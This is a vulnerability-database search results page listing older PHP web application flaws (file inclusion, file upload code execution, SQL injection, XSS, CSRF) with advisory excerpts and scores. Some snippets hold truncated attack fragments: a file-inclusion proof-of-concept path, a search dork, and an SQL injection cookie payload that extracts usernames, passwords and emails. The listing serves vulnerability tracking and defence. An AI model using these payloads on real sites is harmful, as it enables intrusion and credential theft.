Lucene search

853 matches found

seebug.org
added 2014/07/01 12:00 a.m., 16 views

PeopleAggregator <= 1.2pre6-release-53 Multiple RFI Vulnerabilities

No description provided by source. PeopleAggregator 1.2pre6 Multiple Remote File Inclusion Vulnerabilities http://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release-53.tar.gz DORK : copyright 2006 Broadband Mechanics POC : /web/Flickrclient.php?pathprefix=shell...

AI score: 7.1
Exploits: 0
Check Point Advisories
added 2014/06/25 12:00 a.m., 3 views

Simple E-Document upload Remote Code Execution

A remote code execution vulnerability has been found in Simple E-Document. The vulnerability is due to the access cookie which could be abused to bypass authentication. A remote attacker can exploit this weakness to upload malicious PHP files which could result in arbitrary code execution in the...

AI score: 4.2
Exploits: 0
Check Point Advisories
added 2014/06/23 12:00 a.m., 9 views

Joomla Media Manager File Upload Code Execution (CVE-2013-5576)

A remote code execution vulnerability has been found in Joomla Media Manager. The vulnerability is due to the Joomla Media Manager component allowing arbitrary file uploads, and results in arbitrary code execution. A remote attacker can exploit this weakness to upload malicious PHP files which...

CVSS: 6.8, AI score: 4.7, EPSS: 0.48191
Exploits: 5
seebug.org
added 2014/06/17 12:00 a.m., 18 views

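CUUMALL Injection 5-8

Brief description: A new vendor has shown up, so let's dig a bit. Open + closed source code: closed source, ordinary users use the encrypted code, paying users use the open source code, making the mall more secure. A broke user like me can only use the free version, which is the Zend-encoded code. Still, a few files are not Zend-encoded, so I only looked at those files. Details: Fifth issue, in kuaiqian/receivemall.php: $dealTime=trim($_REQUEST['dealTime']); // get the actual amount paid /// unit is fen /// e.g. 2 means 0.02 yuan $payAmount=trim($_REQUEST['payAmount']); // get the transaction fee /// unit is fen /// e.g. 2 means 0.02 yuan...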

AI score: 7.1
Exploits: 0
0day.today
added 2014/04/23 12:00 a.m., 37 views

No-CMS 0.6.6 rev 1 - Admin Account Hijacking / RCE Exploit via Static Encryption Key

Exploit for php platform in category web applications ?php / Static encryptionkey of No-CMS lead to Session Array Injection in order to hijack administrator account then you will be able for upload php files to server via theme/module upload. This exploit generates cookie for administrator access...

AI score: 7.1
Exploits: 0
Packet Storm
added 2014/04/22 12:00 a.m., 52 views

No-CMS 0.6.6 Rev 1 Account Hijack / Remote Command Execution

mcryptexists = functionexists'mcryptencrypt';...

AI score: 0.7
Exploits: 0
Check Point Advisories
added 2014/03/31 12:00 a.m., 14 views

Wim Fleischhauer Docpile INIT_PATH Parameter PHP Code Execution - Ver2 (CVE-2006-4076)

A code execution vulnerability has been reported in Wim Fleischhauer Docpile. An attacker could exploit this vulnerability via a URL in the INIT_PATH parameter to lib/access.inc.php, lib/folders.inc.php, lib/init.inc.php or lib/templates.inc.php. Successful exploitation of this vulnerability could...

AI score: 7.6, EPSS: 0.01862
Exploits: 0
Packet Storm
added 2014/01/28 12:00 a.m., 18 views

Simple E-Document Arbitrary File Upload

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 "Simple E-Document Arbitrary File Upload", 'Description' = %q This module exploits a file upload vulnerability found in Simple...

AI score: 0.3
Exploits: 0
Packet Storm
added 2013/12/16 12:00 a.m., 26 views

BuxAlert PTC SQL Injection

Inject in cookiws usNick usNick=i-Hmx'/! union all select 1,select groupconcatusername,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E from tbusers,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 and 'faris'='1337 require'config.php'; $lole=$COOKIE"usNick"; $tabla = mysqlquery"SELECT FROM tbusers where...

Exploits: 0
Tenable Nessus
added 2013/11/30 12:00 a.m., 35 views

Drupal 6.x < 6.29 Multiple Vulnerabilities

The remote web server is running a version of Drupal that is 6.x prior to 6.29. It is, therefore, potentially affected by multiple vulnerabilities : - An error exists related to the HTML form API and validation callbacks as used by third-party modules that could allow an attacker to bypass the...

CVSS: 6.8, AI score: 6.2, EPSS: 0.03072
Exploits: 0, References: 4
Prion
added 2013/11/05 8:55 p.m., 11 views

Cross site scripting

Multiple cross-site scripting (XSS) vulnerabilities in the WP Ultimate Email Marketer plugin 1.1.0 and possibly earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) siteurl parameter to campaign/campaignone.php; the (2) action, (3) campaignname, (4) campaignformat...

CVSS: 4.3, AI score: 6.3, EPSS: 0.01601
Exploits: 0, References: 2, Affected Software: 1
0day.today
added 2013/10/18 12:00 a.m., 15 views

WordPress Magnitudo theme Arbitrary File Upload Vulnerability

Exploit for php platform in category web applications...

AI score: 7.1
Exploits: 0
Packet Storm
added 2013/10/07 12:00 a.m., 21 views

FlashChat Arbitrary File Upload

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "FlashChat Arbitra...

AI score: 0.3
Exploits: 0
0day.today
added 2013/08/05 12:00 a.m., 19 views

WPtouch / WPtouch Pro XSS / Path Disclosure Vulnerabilities

WPtouch and WPtouch Pro suffer from cross site scripting and path disclosure vulnerabilities. I want to inform you about vulnerabilities in WPtouch and WPtouch Pro plugins for WordPress. These are Cross-Site Scripting and Full path disclosure vulnerabilities. These XSS holes are in...

AI score: 6.6
Exploits: 0
OpenVAS
added 2013/05/23 12:00 a.m., 25 views

Exponent CMS Multiple Vulnerabilities

Exponent CMS is prone to multiple vulnerabilities. SPDX-FileCopyrightText: 2013 Greenbone AG Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:exponentcms:exponentcms";...

CVSS: 7.5, AI score: 6.4, EPSS: 0.02452
Exploits: 5, References: 6
NVD
added 2013/03/14 3:13 a.m., 18 views

CVE-2013-1468

Cross-site request forgery (CSRF) vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors...

CVSS: 7.6, AI score: 7.1, EPSS: 0.05726
Exploits: 10, References: 9
UbuntuCve
added 2013/03/14 3:13 a.m., 28 views

CVE-2013-1468

Cross-site request forgery (CSRF) vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors...

CVSS: 7.6, AI score: 6, EPSS: 0.05726
Exploits: 10, References: 2
Prion
added 2013/03/14 3:13 a.m., 14 views

Cross site request forgery (csrf)

Cross-site request forgery (CSRF) vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors...

CVSS: 7.6, AI score: 7.7, EPSS: 0.05726
Exploits: 10, References: 9, Affected Software: 1
Cvelist
added 2013/03/12 4:00 p.m., 33 views

CVE-2013-1468

Cross-site request forgery (CSRF) vulnerability in the LocalFiles Editor plugin in Piwigo before 2.4.7 allows remote attackers to hijack the authentication of administrators for requests that create arbitrary PHP files via unspecified vectors...

AI score: 7.1, EPSS: 0.05726
Exploits: 10, References: 9
CVE
added 2013/03/12 4:00 p.m., 75 views

CVE-2013-1468

CVE-2013-1468: Piwigo LocalFiles Editor plugin contains a CSRF vulnerability (pre-2.4.7) that enables an attacker to hijack administrator authentication and cause creation of arbitrary PHP files via unspecified vectors. Public details in the NVD description confirm the CSRF flaw with impact on in...

CVSS: 7.6, AI score: 7.2, EPSS: 0.05726
Exploits: 10, References: 9, Affected Software: 1